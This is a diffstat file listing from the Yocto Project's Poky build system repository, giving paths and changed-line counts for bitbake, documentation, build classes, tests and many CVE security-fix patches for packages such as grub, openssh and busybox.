-rw-r--r--README.OE-Core10
-rw-r--r--SECURITY.md24
-rw-r--r--bitbake/SECURITY.md24
-rwxr-xr-xbitbake/bin/bitbake-getvar48
-rwxr-xr-xbitbake/bin/bitbake-worker14
-rw-r--r--bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst4
-rw-r--r--bitbake/lib/bb/__init__.py9
-rw-r--r--bitbake/lib/bb/build.py19
-rw-r--r--bitbake/lib/bb/command.py28
-rw-r--r--bitbake/lib/bb/compat.py10
-rw-r--r--bitbake/lib/bb/cooker.py52
-rw-r--r--bitbake/lib/bb/cookerdata.py14
-rw-r--r--bitbake/lib/bb/data.py1
-rw-r--r--bitbake/lib/bb/data_smart.py20
-rw-r--r--bitbake/lib/bb/event.py16
-rw-r--r--bitbake/lib/bb/fetch2/__init__.py5
-rw-r--r--bitbake/lib/bb/fetch2/git.py54
-rw-r--r--bitbake/lib/bb/fetch2/wget.py24
-rw-r--r--bitbake/lib/bb/monitordisk.py7
-rw-r--r--bitbake/lib/bb/msg.py6
-rw-r--r--bitbake/lib/bb/parse/ast.py2
-rw-r--r--bitbake/lib/bb/parse/parse_py/BBHandler.py2
-rw-r--r--bitbake/lib/bb/parse/parse_py/ConfHandler.py2
-rw-r--r--bitbake/lib/bb/persist_data.py13
-rw-r--r--bitbake/lib/bb/process.py3
-rw-r--r--bitbake/lib/bb/providers.py4
-rw-r--r--bitbake/lib/bb/runqueue.py185
-rw-r--r--bitbake/lib/bb/server/process.py16
-rw-r--r--bitbake/lib/bb/siggen.py3
-rw-r--r--bitbake/lib/bb/tests/codeparser.py30
-rw-r--r--bitbake/lib/bb/tests/event.py17
-rw-r--r--bitbake/lib/bb/tests/fetch.py117
-rw-r--r--bitbake/lib/bb/tinfoil.py17
-rw-r--r--bitbake/lib/bb/ui/knotty.py32
-rw-r--r--bitbake/lib/bb/ui/taskexp.py5
-rw-r--r--bitbake/lib/bb/utils.py52
-rw-r--r--bitbake/lib/bblayers/action.py4
-rw-r--r--bitbake/lib/bblayers/layerindex.py1
-rw-r--r--bitbake/lib/bblayers/query.py8
-rw-r--r--bitbake/lib/hashserv/server.py23
-rw-r--r--bitbake/lib/layerindexlib/__init__.py1
-rw-r--r--bitbake/lib/toaster/toastergui/api.py26
-rw-r--r--documentation/brief-yoctoprojectqs/brief-yoctoprojectqs.rst15
-rw-r--r--documentation/bsp-guide/bsp.rst5
-rw-r--r--documentation/conf.py24
-rw-r--r--documentation/dev-manual/dev-manual-common-tasks.rst76
-rw-r--r--documentation/dev-manual/dev-manual-start.rst19
-rw-r--r--documentation/kernel-dev/kernel-dev-common.rst2
-rw-r--r--documentation/overview-manual/overview-manual-concepts.rst4
-rw-r--r--documentation/overview-manual/overview-manual-development-environment.rst4
-rw-r--r--documentation/overview-manual/overview-manual-yp-intro.rst6
-rw-r--r--documentation/poky.yaml15
-rw-r--r--documentation/profile-manual/profile-manual-usage.rst11
-rw-r--r--documentation/ref-manual/migration-3.0.rst3
-rw-r--r--documentation/ref-manual/ref-classes.rst10
-rw-r--r--documentation/ref-manual/ref-features.rst2
-rw-r--r--documentation/ref-manual/ref-images.rst17
-rw-r--r--documentation/ref-manual/ref-release-process.rst2
-rw-r--r--documentation/ref-manual/ref-system-requirements.rst41
-rw-r--r--documentation/ref-manual/ref-tasks.rst19
-rw-r--r--documentation/ref-manual/ref-variables.rst76
-rw-r--r--documentation/releases.rst94
-rw-r--r--documentation/sphinx-static/switchers.js7
-rw-r--r--documentation/toaster-manual/toaster-manual-reference.rst4
-rw-r--r--meta-poky/conf/distro/poky-tiny.conf2
-rw-r--r--meta-poky/conf/distro/poky.conf30
-rw-r--r--meta-poky/conf/local.conf.sample2
-rw-r--r--meta-poky/conf/local.conf.sample.extended23
-rw-r--r--meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb1
-rw-r--r--meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb2
-rw-r--r--meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded2
-rw-r--r--meta-selftest/recipes-test/images/oe-selftest-image.bb2
-rw-r--r--meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb2
-rw-r--r--meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb1
-rw-r--r--meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb1
-rw-r--r--meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb2
-rw-r--r--meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb3
-rw-r--r--meta-skeleton/recipes-skeleton/service/service_0.1.bb1
-rw-r--r--meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend8
-rw-r--r--meta/classes/archiver.bbclass19
-rw-r--r--meta/classes/base.bbclass18
-rw-r--r--meta/classes/bin_package.bbclass3
-rw-r--r--meta/classes/buildhistory.bbclass34
-rw-r--r--meta/classes/cmake.bbclass3
-rw-r--r--meta/classes/cml1.bbclass8
-rw-r--r--meta/classes/create-spdx-2.2.bbclass1067
-rw-r--r--meta/classes/create-spdx.bbclass8
-rw-r--r--meta/classes/cve-check.bbclass466
-rw-r--r--meta/classes/devshell.bbclass1
-rw-r--r--meta/classes/devtool-source.bbclass4
-rw-r--r--meta/classes/devupstream.bbclass2
-rw-r--r--meta/classes/externalsrc.bbclass33
-rw-r--r--meta/classes/fs-uuid.bbclass2
-rw-r--r--meta/classes/go.bbclass10
-rw-r--r--meta/classes/goarch.bbclass2
-rw-r--r--meta/classes/image-live.bbclass4
-rw-r--r--meta/classes/image.bbclass17
-rw-r--r--meta/classes/image_types.bbclass2
-rw-r--r--meta/classes/insane.bbclass42
-rw-r--r--meta/classes/kernel-arch.bbclass4
-rw-r--r--meta/classes/kernel-devicetree.bbclass18
-rw-r--r--meta/classes/kernel-fitimage.bbclass187
-rw-r--r--meta/classes/kernel-yocto.bbclass55
-rw-r--r--meta/classes/kernel.bbclass69
-rw-r--r--meta/classes/libc-package.bbclass3
-rw-r--r--meta/classes/license.bbclass16
-rw-r--r--meta/classes/license_image.bbclass26
-rw-r--r--meta/classes/linux-dummy.bbclass26
-rw-r--r--meta/classes/metadata_scm.bbclass10
-rw-r--r--meta/classes/mirrors.bbclass5
-rw-r--r--meta/classes/multilib.bbclass2
-rw-r--r--meta/classes/nativesdk.bbclass2
-rw-r--r--meta/classes/package.bbclass47
-rw-r--r--meta/classes/package_deb.bbclass4
-rw-r--r--meta/classes/package_ipk.bbclass3
-rw-r--r--meta/classes/package_pkgdata.bbclass2
-rw-r--r--meta/classes/package_rpm.bbclass8
-rw-r--r--meta/classes/patch.bbclass7
-rw-r--r--meta/classes/populate_sdk_base.bbclass16
-rw-r--r--meta/classes/populate_sdk_ext.bbclass12
-rw-r--r--meta/classes/pypi.bbclass2
-rw-r--r--meta/classes/python3targetconfig.bbclass12
-rw-r--r--meta/classes/qemuboot.bbclass3
-rw-r--r--meta/classes/report-error.bbclass2
-rw-r--r--meta/classes/reproducible_build.bbclass90
-rw-r--r--meta/classes/rm_work.bbclass15
-rw-r--r--meta/classes/rootfs-postcommands.bbclass22
-rw-r--r--meta/classes/rootfsdebugfiles.bbclass2
-rw-r--r--meta/classes/sanity.bbclass36
-rw-r--r--meta/classes/sstate.bbclass98
-rw-r--r--meta/classes/staging.bbclass10
-rw-r--r--meta/classes/testimage.bbclass40
-rw-r--r--meta/classes/toolchain-scripts.bbclass4
-rw-r--r--meta/classes/uninative.bbclass8
-rw-r--r--meta/classes/useradd-staticids.bbclass2
-rw-r--r--meta/classes/useradd.bbclass4
-rw-r--r--meta/classes/utils.bbclass2
-rw-r--r--meta/conf/abi_version.conf2
-rw-r--r--meta/conf/bitbake.conf17
-rw-r--r--meta/conf/distro/include/cve-extra-exclusions.inc75
-rw-r--r--meta/conf/distro/include/default-distrovars.inc4
-rw-r--r--meta/conf/distro/include/maintainers.inc51
-rw-r--r--meta/conf/distro/include/ptest-packagelists.inc2
-rw-r--r--meta/conf/distro/include/yocto-uninative.inc11
-rw-r--r--meta/conf/layer.conf2
-rw-r--r--meta/conf/licenses.conf15
-rw-r--r--meta/conf/multilib.conf2
-rw-r--r--meta/files/common-licenses/Spencer-9412
-rw-r--r--meta/files/common-licenses/Unlicense24
-rw-r--r--meta/files/spdx-licenses.json5937
-rw-r--r--meta/files/toolchain-shar-extract.sh3
-rw-r--r--meta/files/toolchain-shar-relocate.sh6
-rw-r--r--meta/lib/bblayers/create.py2
-rw-r--r--meta/lib/buildstats.py4
-rw-r--r--meta/lib/oe/copy_buildsystem.py6
-rw-r--r--meta/lib/oe/cve_check.py154
-rw-r--r--meta/lib/oe/gpg_sign.py2
-rw-r--r--meta/lib/oe/license.py6
-rw-r--r--meta/lib/oe/package_manager.py15
-rw-r--r--meta/lib/oe/packagedata.py11
-rw-r--r--meta/lib/oe/patch.py6
-rw-r--r--meta/lib/oe/reproducible.py13
-rw-r--r--meta/lib/oe/rootfs.py8
-rw-r--r--meta/lib/oe/sbom.py84
-rw-r--r--meta/lib/oe/spdx.py357
-rw-r--r--meta/lib/oe/sstatesig.py5
-rw-r--r--meta/lib/oe/terminal.py20
-rw-r--r--meta/lib/oe/utils.py3
-rw-r--r--meta/lib/oeqa/core/case.py9
-rw-r--r--meta/lib/oeqa/core/decorator/oetimeout.py5
-rw-r--r--meta/lib/oeqa/core/target/ssh.py4
-rw-r--r--meta/lib/oeqa/core/tests/cases/timeout.py13
-rwxr-xr-xmeta/lib/oeqa/core/tests/test_decorators.py6
-rw-r--r--meta/lib/oeqa/manual/eclipse-plugin.json6
-rw-r--r--meta/lib/oeqa/manual/toaster-managed-mode.json2
-rw-r--r--meta/lib/oeqa/runtime/cases/date.py13
-rw-r--r--meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py36
-rw-r--r--meta/lib/oeqa/runtime/cases/ksample.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/ltp.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/pam.py3
-rw-r--r--meta/lib/oeqa/runtime/cases/parselogs.py21
-rw-r--r--meta/lib/oeqa/runtime/cases/ping.py20
-rw-r--r--meta/lib/oeqa/runtime/cases/rpm.py32
-rw-r--r--meta/lib/oeqa/runtime/cases/rtc.py40
-rw-r--r--meta/lib/oeqa/runtime/cases/scp.py2
-rw-r--r--meta/lib/oeqa/runtime/cases/suspend.py33
-rw-r--r--meta/lib/oeqa/runtime/cases/terminal.py21
-rw-r--r--meta/lib/oeqa/runtime/cases/usb_hid.py22
-rw-r--r--meta/lib/oeqa/runtime/context.py33
-rw-r--r--meta/lib/oeqa/sdk/cases/buildepoxy.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/archiver.py16
-rw-r--r--meta/lib/oeqa/selftest/cases/bblayers.py5
-rw-r--r--meta/lib/oeqa/selftest/cases/bbtests.py13
-rw-r--r--meta/lib/oeqa/selftest/cases/buildoptions.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/cve_check.py186
-rw-r--r--meta/lib/oeqa/selftest/cases/devtool.py19
-rw-r--r--meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt1
-rw-r--r--meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt1
-rw-r--r--meta/lib/oeqa/selftest/cases/distrodata.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/glibc.py8
-rw-r--r--meta/lib/oeqa/selftest/cases/gotoolchain.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/imagefeatures.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/oelib/utils.py3
-rw-r--r--meta/lib/oeqa/selftest/cases/oescripts.py3
-rw-r--r--meta/lib/oeqa/selftest/cases/prservice.py2
-rw-r--r--meta/lib/oeqa/selftest/cases/recipetool.py6
-rw-r--r--meta/lib/oeqa/selftest/cases/reproducible.py125
-rw-r--r--meta/lib/oeqa/selftest/cases/runcmd.py4
-rw-r--r--meta/lib/oeqa/selftest/cases/runqemu.py9
-rw-r--r--meta/lib/oeqa/selftest/cases/runtime_test.py43
-rw-r--r--meta/lib/oeqa/selftest/cases/sstatetests.py14
-rw-r--r--meta/lib/oeqa/selftest/cases/tinfoil.py28
-rw-r--r--meta/lib/oeqa/selftest/cases/wic.py18
-rw-r--r--meta/lib/oeqa/utils/buildproject.py3
-rw-r--r--meta/lib/oeqa/utils/commands.py3
-rw-r--r--meta/lib/oeqa/utils/metadata.py6
-rw-r--r--meta/lib/oeqa/utils/nfs.py4
-rw-r--r--meta/lib/oeqa/utils/qemurunner.py41
-rw-r--r--meta/lib/oeqa/utils/targetbuild.py4
-rw-r--r--meta/recipes-bsp/efibootmgr/efibootmgr_17.bb2
-rw-r--r--meta/recipes-bsp/efivar/efivar/determinism.patch18
-rw-r--r--meta/recipes-bsp/efivar/efivar_37.bb3
-rw-r--r--meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb1
-rw-r--r--meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch235
-rw-r--r--meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch30
-rw-r--r--meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch65
-rw-r--r--meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch59
-rw-r--r--meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch53
-rw-r--r--meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch52
-rw-r--r--meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch53
-rw-r--r--meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch55
-rw-r--r--meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch41
-rw-r--r--meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch34
-rw-r--r--meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch128
-rw-r--r--meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch28
-rw-r--r--meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0021-zfs-Fix-possible-negative-shift-operation.patch42
-rw-r--r--meta/recipes-bsp/grub/files/0022-zfs-Fix-resource-leaks-while-constructing-path.patch121
-rw-r--r--meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch56
-rw-r--r--meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch35
-rw-r--r--meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch82
-rw-r--r--meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch36
-rw-r--r--meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch43
-rw-r--r--meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch52
-rw-r--r--meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch56
-rw-r--r--meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch94
-rw-r--r--meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch78
-rw-r--r--meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch104
-rw-r--r--meta/recipes-bsp/grub/files/0034-video-fb-video_fb-Fix-possible-integer-overflow.patch39
-rw-r--r--meta/recipes-bsp/grub/files/0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch38
-rw-r--r--meta/recipes-bsp/grub/files/0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch34
-rw-r--r--meta/recipes-bsp/grub/files/0037-loader-bsd-Check-for-NULL-arg-up-front.patch47
-rw-r--r--meta/recipes-bsp/grub/files/0038-loader-xnu-Fix-memory-leak.patch38
-rw-r--r--meta/recipes-bsp/grub/files/0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch77
-rw-r--r--meta/recipes-bsp/grub/files/0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch42
-rw-r--r--meta/recipes-bsp/grub/files/0041-util-grub-install-Fix-NULL-pointer-dereferences.patch41
-rw-r--r--meta/recipes-bsp/grub/files/0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch46
-rw-r--r--meta/recipes-bsp/grub/files/0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch50
-rw-r--r--meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch28
-rw-r--r--meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch33
-rw-r--r--meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch37
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372.patch76
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch130
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch431
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch57
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch52
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch158
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-25632.patch90
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-25647.patch119
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27749.patch609
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779.patch70
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch105
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch37
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch35
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch62
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch61
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch65
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-20225.patch58
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-20233.patch50
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3695.patch178
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3696.patch46
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3697.patch82
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2021-3981.patch32
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-2601.patch87
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28733.patch60
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28734.patch67
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28735.patch271
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-28736.patch275
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2022-3775.patch97
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2023-4692.patch97
-rw-r--r--meta/recipes-bsp/grub/files/CVE-2023-4693.patch62
-rw-r--r--meta/recipes-bsp/grub/files/determinism.patch2
-rw-r--r--meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch117
-rw-r--r--meta/recipes-bsp/grub/files/no-insmod-on-sb.patch107
-rw-r--r--meta/recipes-bsp/grub/grub2.inc87
-rw-r--r--meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch36
-rw-r--r--meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb1
-rw-r--r--meta/recipes-bsp/opensbi/opensbi_0.6.bb3
-rw-r--r--meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb5
-rw-r--r--meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb2
-rw-r--r--meta/recipes-bsp/u-boot/u-boot-common.inc4
-rw-r--r--meta/recipes-bsp/v86d/v86d_0.1.10.bb1
-rw-r--r--meta/recipes-connectivity/avahi/avahi.inc10
-rw-r--r--meta/recipes-connectivity/avahi/avahi_0.7.bb3
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch42
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch60
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch48
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch65
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch57
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch53
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch73
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch52
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch45
-rw-r--r--meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch109
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-2795.patch67
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-38177.patch31
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2022-38178.patch33
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2023-2828.patch166
-rw-r--r--meta/recipes-connectivity/bind/bind/CVE-2023-3341.patch175
-rw-r--r--meta/recipes-connectivity/bind/bind_9.11.37.bb (renamed from meta/recipes-connectivity/bind/bind_9.11.22.bb)10
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5.inc8
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch109
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch34
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch95
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch66
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch39
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch126
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch54
-rw-r--r--meta/recipes-connectivity/bluez5/bluez5_5.55.bb10
-rw-r--r--meta/recipes-connectivity/connman/connman-gnome_0.7.bb2
-rw-r--r--meta/recipes-connectivity/connman/connman.inc2
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch62
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch231
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch33
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch72
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch121
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch50
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch37
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch266
-rw-r--r--meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch54
-rw-r--r--meta/recipes-connectivity/connman/connman_1.37.bb9
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch66
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch120
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch40
-rw-r--r--meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb3
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch283
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch254
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch67
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch54
-rw-r--r--meta/recipes-connectivity/inetutils/inetutils_1.9.4.bb4
-rw-r--r--meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb3
-rw-r--r--meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb8
-rw-r--r--meta/recipes-connectivity/neard/neard_0.16.bb13
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch97
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch20
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch52
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch189
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch581
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch171
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch34
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch194
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch73
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch125
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch315
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch38
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch39
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch307
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch120
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch468
-rw-r--r--meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch95
-rw-r--r--meta/recipes-connectivity/openssh/openssh/sshd.socket1
-rw-r--r--meta/recipes-connectivity/openssh/openssh/sshd@.service2
-rw-r--r--meta/recipes-connectivity/openssh/openssh_8.2p1.bb58
-rw-r--r--meta/recipes-connectivity/openssl/openssl/0001-Configure-add-2-missing-key-sorts.patch38
-rw-r--r--meta/recipes-connectivity/openssl/openssl/0001-Configure-do-not-tweak-mips-cflags.patch37
-rw-r--r--meta/recipes-connectivity/openssl/openssl/CVE-2024-0727.patch122
-rw-r--r--meta/recipes-connectivity/openssl/openssl/reproducibility.patch22
-rw-r--r--meta/recipes-connectivity/openssl/openssl_1.1.1w.bb (renamed from meta/recipes-connectivity/openssl/openssl_1.1.1i.bb)7
-rw-r--r--meta/recipes-connectivity/ppp-dialin/ppp-dialin_0.1.bb1
-rw-r--r--meta/recipes-connectivity/ppp/ppp/CVE-2022-4603.patch50
-rw-r--r--meta/recipes-connectivity/ppp/ppp_2.4.7.bb1
-rw-r--r--meta/recipes-connectivity/resolvconf/resolvconf_1.82.bb2
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-0326.patch45
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-27803.patch58
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2021-30004.patch123
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant/CVE-2022-23303-4.patch609
-rw-r--r--meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb5
-rw-r--r--meta/recipes-core/base-files/base-files/hosts2
-rw-r--r--meta/recipes-core/base-passwd/base-passwd_3.5.29.bb1
-rw-r--r--meta/recipes-core/busybox/busybox.inc29
-rw-r--r--meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch51
-rw-r--r--meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch38
-rw-r--r--meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch81
-rw-r--r--meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch64
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2021-42374.patch53
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2021-42376.patch138
-rw-r--r--meta/recipes-core/busybox/busybox/CVE-2022-48174.patch82
-rw-r--r--meta/recipes-core/busybox/busybox_1.31.1.bb10
-rw-r--r--meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch215
-rw-r--r--meta/recipes-core/coreutils/coreutils_8.31.bb8
-rw-r--r--meta/recipes-core/dbus-wait/dbus-wait_git.bb3
